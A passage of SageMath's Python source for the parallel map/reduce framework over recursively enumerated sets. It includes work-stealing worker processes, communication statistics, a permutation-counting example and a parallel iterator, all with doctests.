
    - ``max_proc`` -- (integer, default: ``None``) if given, the
      maximum number of worker processors to use. The actual number
      is also bounded by the value of the environment variable
      ``SAGE_NUM_THREADS`` (the number of cores by default).

    - ``reduce_locally`` -- See :class:`RESetMapReduceWorker` (default: ``True``)

    - ``timeout`` -- a timeout on the computation (default: ``None``)

    - ``profile`` -- directory/filename prefix for profiling, or ``None``
      for no profiling (default: ``None``)

    OUTPUT:

    The result of the map/reduce computation or an exception
    :exc:`AbortError` if the computation was interrupted or timeout.

    EXAMPLES::

        sage: from sage.parallel.map_reduce import RESetMPExample
        sage: EX = RESetMPExample(maxl = 8)
        sage: EX.run()
        40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1

    Here is an example or how to deal with timeout::

        sage: from sage.parallel.map_reduce import AbortError
        sage: EX = RESetMPExample(maxl = 100)
        sage: try:
        ....:     res = EX.run(timeout=0.01)
        ....: except AbortError:
        ....:     print("Computation timeout")
        ....: else:
        ....:     print("Computation normally finished")
        ....:     res
        Computation timeout

    The following should not timeout even on a very slow machine::

        sage: from sage.parallel.map_reduce import AbortError
        sage: EX = RESetMPExample(maxl = 8)
        sage: try:
        ....:     res = EX.run(timeout=60)
        ....: except AbortError:
        ....:     print("Computation Timeout")
        ....: else:
        ....:     print("Computation normally finished")
        ....:     res
        Computation normally finished
        40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
    """
    self._profile=profile
    self.setup_workers(max_proc, reduce_locally)
    self.start_workers()
    if timeout is not None:
        # A watchdog thread that aborts the whole computation after
        # ``timeout`` seconds (see ``abort``).
        from threading import Timer
        self._timer = Timer(timeout, self.abort)
        self._timer.start()
    self.result = self.get_results(timeout=timeout)
    if timeout is not None:
        # Normal completion: disarm the watchdog.
        self._timer.cancel()
    logger.info("Returning")
    self.finish()
    # ``_aborted`` is set either by the watchdog or by an explicit
    # ``abort`` call; in both cases the result is unusable.
    if self._aborted.value:
        raise AbortError
    else:
        return self.result
def _get_stats(self):
    r"""
    Gather the communication statistics at the end of a run.

    Snapshots each worker's shared ``_stats`` array into a plain tuple and
    stores the list of snapshots as ``self._stats``.

    EXAMPLES::

        sage: from sage.parallel.map_reduce import RESetMPExample
        sage: S = RESetMPExample(maxl=6)
        sage: S.run()  # indirect doctest
        720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
    """
    # List comprehension instead of the manual append loop (same order,
    # same contents).
    self._stats = [tuple(self._workers[i]._stats)
                   for i in range(self._nprocess)]
def print_communication_statistics(self, blocksize=16):
    r"""
    Print the communication statistics in a nice way.

    INPUT:

    - ``blocksize`` -- (default: 16) number of worker columns printed
      per block of output.

    EXAMPLES::

        sage: from sage.parallel.map_reduce import RESetMPExample
        sage: S = RESetMPExample(maxl=6)
        sage: S.run()
        720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1

        sage: S.print_communication_statistics()  # random
        #proc:        0    1    2    3    4    5    6    7
        reqs sent:    5    2    3   11   21   19    1    0
        reqs rcvs:   10   10    9    5    1   11    9    2
        - thefs:      1    0    0    0    0    0    0    0
        + thefs:      0    0    1    0    0    0    0    0
    """
    # ``nonlocal`` replaces the Python-2-era ``res = [""]`` mutable-list
    # closure trick used previously; behavior is unchanged.
    res = ""

    def pstat(name, start, end, ist):
        nonlocal res
        res += ("\n" + name + " ".join(
            "%4i" % (self._stats[i][ist]) for i in range(start, end)))

    for start in range(0, self._nprocess, blocksize):
        end = min(start + blocksize, self._nprocess)
        res = ("#proc: " +
               " ".join("%4i" % (i) for i in range(start, end)))
        pstat("reqs sent: ", start, end, 0)
        pstat("reqs rcvs: ", start, end, 1)
        pstat("- thefs: ", start, end, 2)
        pstat("+ thefs: ", start, end, 3)
    print(res)
def run_serial(self):
    r"""
    Run the computation serially (mostly for tests).

    EXAMPLES::

        sage: from sage.parallel.map_reduce import RESetMPExample
        sage: EX = RESetMPExample(maxl = 4)
        sage: EX.run_serial()
        24*x^4 + 6*x^3 + 2*x^2 + x + 1
    """
    from functools import reduce
    # Map lazily over the forest, then fold with the reducer.
    mapped = (self.map_function(node) for node in self._forest)
    return reduce(self.reduce_function, mapped, self.reduce_init())
class RESetMapReduceWorker(mp.Process):
    """
    Worker for generate-map-reduce.

    This shouldn't be called directly, but instead created by
    :meth:`RESetMapReduce.setup_workers`.

    INPUT:

    - ``mapred`` -- the instance of :class:`RESetMapReduce` for which
      this process is working.

    - ``iproc`` -- the id of this worker.

    - ``reduce_locally`` -- when reducing the results. Three possible values
      are supported:

      * ``True`` -- means the reducing work is done all locally, the result is
        only sent back at the end of the work. This ensure the lowest level of
        communication.

      * ``False`` -- results are sent back after each finished branches, when
        the process is asking for more work.
    """
    def __init__(self, mapred, iproc, reduce_locally):
        r"""
        TESTS::

            sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
            sage: EX = RESetMPExample()
            sage: RESetMapReduceWorker(EX, 200, True)
            <RESetMapReduceWorker(RESetMapReduceWorker-..., initial)>
        """
        mp.Process.__init__(self)
        self._iproc = iproc
        # Deque of nodes still to explore: this worker pops from the right,
        # the thief thread steals from the left.
        self._todo = collections.deque()
        self._request = mp.SimpleQueue()  # Faster than Queue
        # currently this is not possible to have to simultaneous read or write
        # on the following Pipe. So there is no need to have a queue.
        self._read_task, self._write_task = mp.Pipe(duplex=False)
        self._mapred = mapred
        # Communication statistics, shared with the master:
        # [0] steal requests sent, [1] steal requests received,
        # [2] thefts served to other workers, [3] successful steals received.
        self._stats = mp.RawArray('i', 4)
        self._reduce_locally = reduce_locally

    def _thief(self):
        r"""
        Run the thief thread of this worker process.

        Serves steal requests from the other workers by handing out nodes
        taken from the left end of this worker's todo list, until the
        :exc:`AbortError` poison pill is received.
        """
        logger.debug("Thief started")
        reqs = 0
        thefts = 0
        try:
            for ireq in iter(self._request.get, AbortError):
                reqs += 1
                target = self._mapred._workers[ireq]
                logger.debug("Got a Steal request from %s" % target.name)
                self._mapred._signal_task_start()
                try:
                    work = self._todo.popleft()
                except IndexError:
                    # Nothing to give away; the requester will retry.
                    target._write_task.send(None)
                    logger.debug("Failed Steal %s" % target.name)
                    self._mapred._signal_task_done()
                else:
                    target._write_task.send(work)
                    logger.debug("Succesful Steal %s" % target.name)
                    thefts += 1
        except AbortError:
            logger.debug("Thief aborted")
        else:
            logger.debug("Thief received poison pill")
        if self._mapred._aborted.value:  # Computation was aborted
            self._todo.clear()
        else:  # Check that there is no remaining work
            assert len(self._todo) == 0, "Bad stop the result may be wrong"
        self._stats[1] = reqs
        self._stats[2] = thefts
        logger.debug("Thief Exiting")

    def steal(self):
        r"""
        Steal some node from another worker.

        OUTPUT:

        A node stolen from another worker chosen at random.

        EXAMPLES::

            sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
            sage: from threading import Thread
            sage: EX = RESetMPExample(maxl=6)
            sage: EX.setup_workers(2)
            sage: w0, w1 = EX._workers
            sage: w0._todo.append(42)
            sage: thief0 = Thread(target = w0._thief, name="Thief")
            sage: thief0.start() # known bug (Trac #27537)
            sage: w1.steal() # known bug (Trac #27537)
            42
            sage: w0._todo # known bug (Trac #27537)
            deque([])
        """
        # This worker is out of local work: report its task as done until
        # a steal succeeds (``steal`` restarts a task via the victim's
        # thief thread calling ``_signal_task_start``).
        self._mapred._signal_task_done()
        node = None
        while node is None:
            victim = self._mapred.random_worker()
            if victim is not self:
                logger.debug("Trying to steal from %s" % victim.name)
                victim._request.put(self._iproc)
                self._stats[0] += 1
                logger.debug("waiting for steal answer from %s" % victim.name)
                # ``None`` means the victim had nothing to give; retry.
                node = self._read_task.recv()
                # logger.debug("Request answer: %s" % (node,))
                if node is AbortError:
                    raise AbortError
        # logger.debug("Received a stolen node: %s" % (node,))
        self._stats[3] += 1
        return node

    def run(self):
        r"""
        The main function executed by the worker.

        Calls :meth:`run_myself` after possibly setting up parallel profiling.

        EXAMPLES::

            sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
            sage: EX = RESetMPExample(maxl=6)
            sage: EX.setup_workers(1)
            sage: w = EX._workers[0]
            sage: w._todo.append(EX.roots()[0])

            sage: w.run()
            sage: sleep(1)
            sage: w._todo.append(None)

            sage: EX.get_results()
            720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1

        Cleanups::

            sage: del EX._results, EX._active_tasks, EX._done, EX._workers
        """
        profile = self._mapred._profile
        if profile is not None:
            import cProfile
            PROFILER = cProfile.Profile()
            PROFILER.runcall(self.run_myself)
            output = profile + str(self._iproc)
            # ``Logger.warn`` is a deprecated alias of ``warning`` (removed
            # in Python 3.13); use the supported name.
            logger.warning("Profiling in %s ..." % output)
            PROFILER.dump_stats(output)
        else:
            self.run_myself()

    def run_myself(self):
        r"""
        The main function executed by the worker.

        EXAMPLES::

            sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
            sage: EX = RESetMPExample(maxl=6)
            sage: EX.setup_workers(1)
            sage: w = EX._workers[0]
            sage: w._todo.append(EX.roots()[0])
            sage: w.run_myself()

            sage: sleep(1)
            sage: w._todo.append(None)

            sage: EX.get_results()
            720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1

        Cleanups::

            sage: del EX._results, EX._active_tasks, EX._done, EX._workers
        """
        logger.debug("Started")
        mapred = self._mapred
        reduce_init = mapred.reduce_init
        results = mapred._results
        self._stats[0] = 0
        self._stats[3] = 0
        logger.debug("Launching thief")
        # NOTE: this deliberately rebinds the ``_thief`` method name to the
        # Thread object; the method itself is kept alive as the thread target.
        self._thief = Thread(target = self._thief, name="Thief")
        self._thief.start()
        self._res = reduce_init()
        try:
            # Work loop: exhaust the local todo list, then steal; an
            # AbortError (raised from ``steal``) signals the end of the run.
            while True:
                try:
                    node = self._todo.pop()
                except IndexError:
                    node = self.steal()
                self.walk_branch_locally(node)
                if not self._reduce_locally:
                    self.send_partial_result()
        except AbortError:
            logger.debug("Worker Done !")
            # Send the final partial result followed by the ``None``
            # sentinel consumed by ``RESetMapReduce.get_results``.
            results.put(self._res)
            results.put(None)
        self._thief.join()
        del self._request
        self._read_task.close()
        self._write_task.close()
        del self._read_task, self._write_task
        del self._mapred
        del self._stats
        logger.debug("Exiting")

    def send_partial_result(self):
        r"""
        Send results to the MapReduce process.

        Send the result stored in ``self._res`` to the master an reinitialize it to
        ``master.reduce_init``.

        EXAMPLES::

            sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
            sage: EX = RESetMPExample(maxl=4)
            sage: EX.setup_workers(1)
            sage: w = EX._workers[0]
            sage: w._res = 4
            sage: w.send_partial_result()
            sage: w._res
            0
            sage: EX._results.get()
            4
        """
        self._mapred._results.put(self._res)
        self._res = self._mapred.reduce_init()

    def walk_branch_locally(self, node):
        r"""
        Work locally.

        Performs the map/reduce computation on the subtrees rooted at ``node``.

        INPUT:

        - ``node`` -- the root of the subtree explored.

        OUTPUT:

        Nothing, the result are stored in ``self._res``.

        This is where the actual work is performed.

        EXAMPLES::

            sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
            sage: EX = RESetMPExample(maxl=4)
            sage: w = RESetMapReduceWorker(EX, 0, True)
            sage: def sync(): pass
            sage: w.synchronize = sync
            sage: w._res = 0

            sage: w.walk_branch_locally([])
            sage: w._res
            x^4 + x^3 + x^2 + x + 1

            sage: w.walk_branch_locally(w._todo.pop())
            sage: w._res
            2*x^4 + x^3 + x^2 + x + 1

            sage: while True: w.walk_branch_locally(w._todo.pop())
            Traceback (most recent call last):
            ...
            IndexError: pop from an empty deque

            sage: w._res
            24*x^4 + 6*x^3 + 2*x^2 + x + 1
        """
        mapred = self._mapred
        children = mapred.children
        post_process = mapred.post_process
        fun = mapred.map_function
        reduc = mapred.reduce_function

        # logger.debug("Working on %s..." % (node,))
        # Descend depth-first along the first child; the remaining children
        # are pushed on the todo list (where the thief may steal them).
        while True:
            res = post_process(node)
            if res is not None:
                self._res = reduc(self._res, fun(res))
            newnodes = iter(children(node))
            try:
                node = next(newnodes)
            except StopIteration:
                return
            self._todo.extend(newnodes)
class RESetMPExample(RESetMapReduce):
    r"""
    An example of map reduce class.

    INPUT:

    - ``maxl`` -- the maximum size of permutations generated (default to `9`).

    This computes the generating series of permutations counted by their size
    up to size ``maxl``.

    EXAMPLES::

        sage: from sage.parallel.map_reduce import RESetMPExample
        sage: EX = RESetMPExample()
        sage: EX.run()
        362880*x^9 + 40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5
         + 24*x^4 + 6*x^3 + 2*x^2 + x + 1

    .. SEEALSO:: This is an example of :class:`RESetMapReduce`
    """
    def __init__(self, maxl = 9):
        r"""
        TESTS::

            sage: from sage.parallel.map_reduce import RESetMPExample
            sage: RESetMPExample()
            <sage.parallel.map_reduce.RESetMPExample object at 0x...>
        """
        RESetMapReduce.__init__(self)
        from sage.rings.polynomial.polynomial_ring import polygen
        from sage.rings.integer_ring import ZZ
        # Generator of the polynomial ring in which the series lives.
        self.x = polygen(ZZ, 'x')
        self.maxl = maxl

    def roots(self):
        r"""
        Return the singleton list containing the empty permutation.

        EXAMPLES::

            sage: from sage.parallel.map_reduce import RESetMPExample
            sage: RESetMPExample().roots()
            [[]]
        """
        return [[]]

    def children(self, l):
        r"""
        Return the children of the permutation `l`.

        INPUT:

        - ``l`` -- a list containing a permutation

        OUTPUT:

        The lists with ``len(l)`` inserted at all possible positions into ``l``.

        EXAMPLES::

            sage: from sage.parallel.map_reduce import RESetMPExample
            sage: RESetMPExample().children([1,0])
            [[2, 1, 0], [1, 2, 0], [1, 0, 2]]
        """
        # Stop the recursion once permutations reach the maximal size.
        if len(l) >= self.maxl:
            return []
        n = len(l)
        return [l[:i] + [n] + l[i:] for i in range(n + 1)]

    def map_function(self, l):
        r"""
        The monomial associated to the permutation `l`.

        INPUT:

        - ``l`` -- a list containing a permutation

        OUTPUT:

        The monomial ``x^len(l)``.

        EXAMPLES::

            sage: from sage.parallel.map_reduce import RESetMPExample
            sage: RESetMPExample().map_function([1,0])
            x^2
        """
        return self.x ** len(l)
class RESetParallelIterator(RESetMapReduce):
    r"""
    A parallel iterator for recursively enumerated sets.

    This demonstrates how to use :class:`RESetMapReduce` to get an iterator on
    a recursively enumerated set for which the computations are done in
    parallel.

    EXAMPLES::

        sage: from sage.parallel.map_reduce import RESetParallelIterator
        sage: S = RESetParallelIterator([[]],
        ....:     lambda l: [l + [0], l + [1]] if len(l) < 15 else [])
        sage: sum(1 for _ in S)
        65535
    """
    def map_function(self, z):
        r"""
        Return a singleton tuple.

        INPUT:

        - ``z`` -- a node

        OUTPUT:

        The singleton ``(z, )``.

        EXAMPLES::

            sage: from sage.parallel.map_reduce import RESetParallelIterator
            sage: S = RESetParallelIterator( [[]],
            ....:     lambda l: [l + [0], l + [1]] if len(l) < 15 else [])
            sage: S.map_function([1, 0])
            ([1, 0],)
        """
        return (z,)

    # Partial results are concatenations of singleton tuples, so the
    # neutral element for the (default ``+``) reduction is the empty tuple.
    reduce_init = tuple

    def __iter__(self):
        r"""
        Iterate over the nodes of the set, in the order produced by the
        parallel workers (hence essentially random).

        EXAMPLES::

            sage: from sage.parallel.map_reduce import RESetParallelIterator
            sage: S = RESetParallelIterator( [[]],
            ....:     lambda l: [l + [0], l + [1]] if len(l) < 15 else [])
            sage: it = iter(S)
            sage: next(it)  # random
            [1, 1, 0]
            sage: next(it)  # random
            [1, 1, 0, 1]
            sage: sum(1 for _ in it)
            65533
        """
        # ``reduce_locally=False`` makes workers send their tuples of nodes
        # as soon as possible instead of reducing until the end of the run.
        self.setup_workers(reduce_locally=False)
        self.start_workers()
        active_proc = self._nprocess
        while True:
            # Each worker posts tuples of nodes, then a final ``None``
            # sentinel when it is done.
            newres = self._results.get()
            if newres is not None:
                logger.debug("Got some results")
                for r in newres:
                    yield r
            else:
                active_proc -= 1
                if active_proc == 0:
                    break
        self.finish()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.